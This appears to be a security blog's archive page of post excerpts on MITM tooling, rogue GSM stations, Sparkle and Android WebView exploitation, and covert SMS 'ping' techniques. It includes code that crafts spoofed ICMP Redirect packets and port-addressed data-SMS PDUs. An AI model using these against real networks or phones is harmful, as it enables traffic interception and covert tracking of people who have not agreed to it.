How I Defeated an Obfuscated and Anti-Tamper APK With Some Python and a Home-Made Smali Emulator.

This Saturday afternoon I was chatting with a friend of mine ( Matteo ) and he asked me for some help fixing a Python script he was working on.

He was trying to deobfuscate an APK in order to understand its obfuscation and anti-tampering (more on this later) protections, so I started working on it as well.

This was definitely way more challenging ( and fun! ) than my usual APK reversing session ( dex2jar -> jd-gui -> done ); moreover, it required me to write a new tool which I find kinda cool and unique ( IMHO of course ), so I’m going to share the story in this post.

I’m going to intentionally skip a few details here and there because I do not want to cause any harm to the people who wrote that application; all the protection mechanisms involved are there to prevent piracy.

How to Build Your Own Rogue GSM BTS for Fun and Profit

Last week I’ve been visiting my friend and colleague Ziggy in Tel Aviv, who gave me something I’ve been waiting for almost a year: a brand new BladeRF x40, a low-cost USB 3.0 Software Defined Radio working in full-duplex, meaning that it can transmit and receive at the same time ( while, for instance, the HackRF is only half-duplex ).

In this blog post I’m going to explain how to create a portable GSM BTS which can be used either to create a private ( and vendor-free! ) GSM network or for GSM active tapping/interception/hijacking … yes, with some (relatively) cheap electronic equipment you can basically build something very similar to what governments have been using for years to perform GSM interception.

I’m not writing this post to help script kiddies break the law; my point is that GSM is broken by design and it’s about time vendors did something about it, considering how much we’re paying for their services.

( image: my BTS )

OSX Mass Pwning Using BetterCap and the Sparkle Updater Vulnerability.


Yesterday Radek from VulnSec posted an interesting article named “There’s a lot of vulnerable OS X applications out there.“. He discovered that the Sparkle update system ( used by some very popular OSX apps such as VLC, Adium, iTerm and so forth ) uses HTTP instead of HTTPS to fetch update information for such applications, making all of them vulnerable to man-in-the-middle attacks and, as he showed, remote command execution attacks.

I’m not going to explain the details of his attack, his post is quite self-explanatory, but I’ll show you how easy it is to mass pwn OSX machines on your network using the new OSX Sparkle bettercap proxy module.

Why You Shouldn't Trust CloudFlare's 'Flexible SSL' and How to Bypass It With BetterCap

Let me make one thing clear about this post … this is not a CloudFlare vulnerability report and, even if it were, there’s really nothing they could do in order to fix it unless they blocked direct traffic to HTTP websites.
This is only a blog post about why you shouldn’t blindly trust free services that offer you some sort of SSL protection if your server itself is not SSL protected by default.

Autopwn Every Android < 4.2 Device on Your Network Using BetterCap and the addJavascriptInterface Vulnerability.

Recently I’ve been playing with Android’s WebView based vulnerabilities, focusing on how to exploit them using a MITM attack.
One of the most interesting ones is the addJavascriptInterface vulnerability ( CVE-2012-6636 ), which affects every device running a version older than Android 4.2.

BetterCap and the First REAL DoubleDirect ICMP Redirect Attack

The next release of bettercap will include a new spoofer module as an alternative to the default ARP spoofer.
The new module performs a fully automated, full-duplex ICMP Redirect MITM attack, which my colleagues at Zimperium discovered and named the DoubleDirect attack.

BetterCap will be the very first MITM framework to have this feature 100% working without any additional spoofers.
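The building block of the attack described above is a single ICMP Redirect datagram per (victim, destination) pair: an ICMP type 5 message, spoofed from the real gateway to the victim, that says “for this destination, use this other gateway” and quotes the first bytes of the datagram it pretends to answer. The block below is an added example, not bettercap’s code, and it does not show how the spoofer automates the full-duplex part (learning which destinations a victim talks to and keeping the redirects flowing). All addresses and ports are constructed for the demo, and nothing is put on the wire.

```python
"""ICMP Redirect datagram, built and decoded offline.

Added example, not bettercap's code. Addresses are constructed lab values;
actually sending the packet needs a raw socket (CAP_NET_RAW).
"""
import socket
import struct

ICMP_REDIRECT = 5
ICMP_REDIRECT_HOST = 1   # code 1: "redirect datagrams for the host" (RFC 792)


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words; yields 0 for a good packet."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_header(src: str, dst: str, proto: int, payload_len: int, ttl: int = 64) -> bytes:
    """Minimal 20-byte IPv4 header (no options) with its header checksum filled in."""
    hdr = struct.pack("!BBHHHBBH4s4s",
                      0x45, 0, 20 + payload_len, 0x1234, 0, ttl, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]


def icmp_redirect(gateway: str, attacker: str, victim: str, destination: str,
                  proto: int = socket.IPPROTO_TCP, sport: int = 40000, dport: int = 443) -> bytes:
    """IP/ICMP Redirect spoofed from `gateway` to `victim`: "for `destination`, use `attacker`".

    Host redirects are per destination, so the quoted "original datagram"
    must carry the victim -> destination pair the victim is really using.
    """
    quoted = (ipv4_header(victim, destination, proto, 8)
              + struct.pack("!HHI", sport, dport, 0))       # first 8 octets of the datagram
    icmp = struct.pack("!BBH4s", ICMP_REDIRECT, ICMP_REDIRECT_HOST, 0,
                       socket.inet_aton(attacker)) + quoted
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    return ipv4_header(gateway, victim, socket.IPPROTO_ICMP, len(icmp)) + icmp


def parse_icmp_redirect(pkt: bytes) -> dict:
    """Decode a redirect the way a receiving stack would, verifying both checksums."""
    ip, icmp = pkt[:20], pkt[20:]
    if inet_checksum(ip) != 0 or inet_checksum(icmp) != 0:
        raise ValueError("checksum mismatch")
    if ip[9] != socket.IPPROTO_ICMP:
        raise ValueError("not an ICMP datagram")
    typ, code, _, gw = struct.unpack("!BBH4s", icmp[:8])
    quoted = icmp[8:]
    return {
        "src": socket.inet_ntoa(ip[12:16]),
        "dst": socket.inet_ntoa(ip[16:20]),
        "type": typ,
        "code": code,
        "new_gateway": socket.inet_ntoa(gw),
        "redirected_destination": socket.inet_ntoa(quoted[16:20]),
    }


if __name__ == "__main__":
    # constructed lab addresses: real gateway, attacker, victim, remote server
    pkt = icmp_redirect("192.168.1.1", "192.168.1.66", "192.168.1.10", "93.184.216.34")
    print(len(pkt), "bytes:", pkt.hex())
    print(parse_icmp_redirect(pkt))
```

Two details matter in practice: the outer source address is the victim’s real first-hop gateway, because RFC 1122 hosts only honour redirects that come from the gateway they are currently using for that destination, and the victim’s kernel can simply refuse them ( on Linux, `net.ipv4.conf.*.accept_redirects` ), which is also the obvious hardening against this class of attack.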

Past, Present and Future of Bettercap

Four months have passed since my first blog post about bettercap; a lot of fixes have been released and a lot of new features have been implemented.
In this post I’d like to talk about some of these new features and describe them a little. This is basically a big changelog since the very first version; for a complete list of code changes you can read the releases page on GitHub.

Karma: How Open Source Changed My Life.

( or “How the anarchy of ideas can change things” )

This time I’ve decided to write a purely personal post, mainly because I’ve reached a stage in my life in which I believe I’ve understood a number of things that I’d like to share, in the hopes of helping someone facing similar circumstances to my own.

I don’t feel my knowledge of the English language would have allowed me to express myself accurately, so I wrote this in Italian and had it translated by a friend of mine ( tnx! ).

Karma: How Open Source Changed My Life. ( Italian original: “Karma: Come l'Open Source Ha Cambiato La Mia Vita.” )

( or “How the anarchy of ideas can change things” )

This time I want to write a purely personal post, mainly because I’ve reached a point in my life at which I think I’ve understood a few things that I’m happy to share and that may help many people in my same situation.

In Italian because, unfortunately, my knowledge of the English language is not deep enough to let me express myself at my best.

How to Use Old GSM Protocols/encodings to Know if a User Is Online on the GSM Network AKA PingSMS 2.0

In the last few months I’ve been playing with Android’s low-level GSM API. A few years ago the (in)famous sendRawPdu API was available, allowing a developer to manually encode an SMS message at a very low level before sending it to the GSM baseband itself, and quite a few applications sending all kinds of weird SMS ( flash SMS, silent SMS, etc. ) were born ( for a brief overview of PDU encoding refer to this page ).

(Un)fortunately Google decided to remove that API. It’s still not clear whether they did it for security reasons or during some refactoring of their IPC IBinder mechanism, but nowadays it’s no longer available unless you use some very old phones/firmwares ( on most devices they removed the ttyUSB serial interfaces used to send AT commands to the GSM modem as well ).

Until a couple of months ago, when I found the SmsManager.sendDataMessage API which, apparently, isn’t used anywhere ( if you search for it you’ll find only a few examples, but nothing about how to use it with manually encoded PDUs ).
Using this API we’re able to manually encode our SMS; moreover, we can specify a “port” as one of its arguments which identifies what kind of SMS we’re going to send. In this post I’ll talk about port 2948, namely the port used to send WAP PUSH notifications.
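What the “port” argument turns into on the wire is a User Data Header in the SMS-SUBMIT PDU: an application-port-addressing information element ( IEI 0x05 ) carrying a 16-bit destination and source port in front of the 8-bit payload. The block below is an added example, not code from the original post or from the PingSMS app: it encodes such a PDU by hand, in the shape a modem accepts after AT+CMGS, so the port layer can be seen without going through the Android API. The phone number and payload bytes are constructed, and the source port 9200 is an assumption ( any value works; only the destination port selects the receiver ).

```python
"""SMS-SUBMIT PDU for an 8-bit data SMS addressed to a WDP port (UDH port addressing).

Added example, not from the original post or the PingSMS app. Phone number,
payload bytes and the 9200 source port are constructed/assumed values.
"""
import struct

WAP_PUSH_PORT = 2948   # destination port named in the post (WAP PUSH)
SRC_PORT = 9200        # assumption: WSP connectionless port; any value is accepted


def encode_address(number: str) -> bytes:
    """TP-DA: digit count, type-of-address, then nibble-swapped digits (F padded)."""
    international = number.startswith("+")
    digits = number.lstrip("+")
    if not digits.isdigit():
        raise ValueError("phone number must be digits, optionally with a leading +")
    toa = 0x91 if international else 0x81      # international / unknown type of number
    padded = digits + "F" if len(digits) % 2 else digits
    swapped = "".join(padded[i + 1] + padded[i] for i in range(0, len(padded), 2))
    return bytes([len(digits), toa]) + bytes.fromhex(swapped)


def port_addressing_udh(dst_port: int, src_port: int) -> bytes:
    """User Data Header holding one IE: 0x05 = application port addressing, 16-bit ports."""
    ie = struct.pack("!BBHH", 0x05, 0x04, dst_port, src_port)
    return bytes([len(ie)]) + ie               # UDHL + IE


def sms_submit_pdu(dest: str, payload: bytes, dst_port: int = WAP_PUSH_PORT,
                   src_port: int = SRC_PORT, status_report: bool = True) -> bytes:
    """Return the TPDU (no SMSC prefix) of a single-part 8-bit data SMS with a port UDH."""
    user_data = port_addressing_udh(dst_port, src_port) + payload
    if len(user_data) > 140:
        raise ValueError("single-part data SMS: at most 140 octets including the UDH")
    first_octet = 0x01 | 0x40                  # SMS-SUBMIT, TP-UDHI = UDH present
    if status_report:
        first_octet |= 0x20                    # TP-SRR: ask the SMSC for a delivery report
    tpdu = bytes([first_octet, 0x00])          # first octet, TP-MR (message reference)
    tpdu += encode_address(dest)
    tpdu += bytes([0x00, 0x04])                # TP-PID default, TP-DCS 0x04 = 8-bit data
    tpdu += bytes([len(user_data)]) + user_data  # TP-UDL counts octets for 8-bit data
    return tpdu


def at_cmgs(tpdu: bytes):
    """(length, hex) as a modem wants them: AT+CMGS=<len>, then hex with a 00 SMSC prefix."""
    return len(tpdu), "00" + tpdu.hex().upper()


def decode_ports(tpdu: bytes):
    """Walk a TPDU back to its port-addressing IE; used to sanity-check the encoder."""
    if not tpdu[0] & 0x40:
        raise ValueError("no UDH in this PDU")
    da_octets = (tpdu[2] + 1) // 2             # digits are packed two per octet
    i = 4 + da_octets                          # skip first octet, TP-MR, TP-DA -> TP-PID
    i += 3                                     # TP-PID, TP-DCS, TP-UDL
    udhl = tpdu[i]
    i += 1
    end = i + udhl
    while i < end:
        iei, iedl = tpdu[i], tpdu[i + 1]
        if iei == 0x05 and iedl == 4:
            return struct.unpack("!HH", tpdu[i + 2:i + 6])
        i += 2 + iedl
    raise ValueError("no port addressing IE")


if __name__ == "__main__":
    # constructed recipient and opaque payload; a real WAP PUSH body goes here
    pdu = sms_submit_pdu("+393331234567", b"\x01\x02\x03\x04")
    length, hexpdu = at_cmgs(pdu)
    print("AT+CMGS=%d" % length)
    print(hexpdu)
    print("ports:", decode_ports(pdu))
```

TP-SRR is set because a status report from the SMSC is the only feedback the sender gets about delivery; whether and when the operator actually returns one is network dependent, which is the caveat to keep in mind when reading any “is the user online” result built on top of this.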

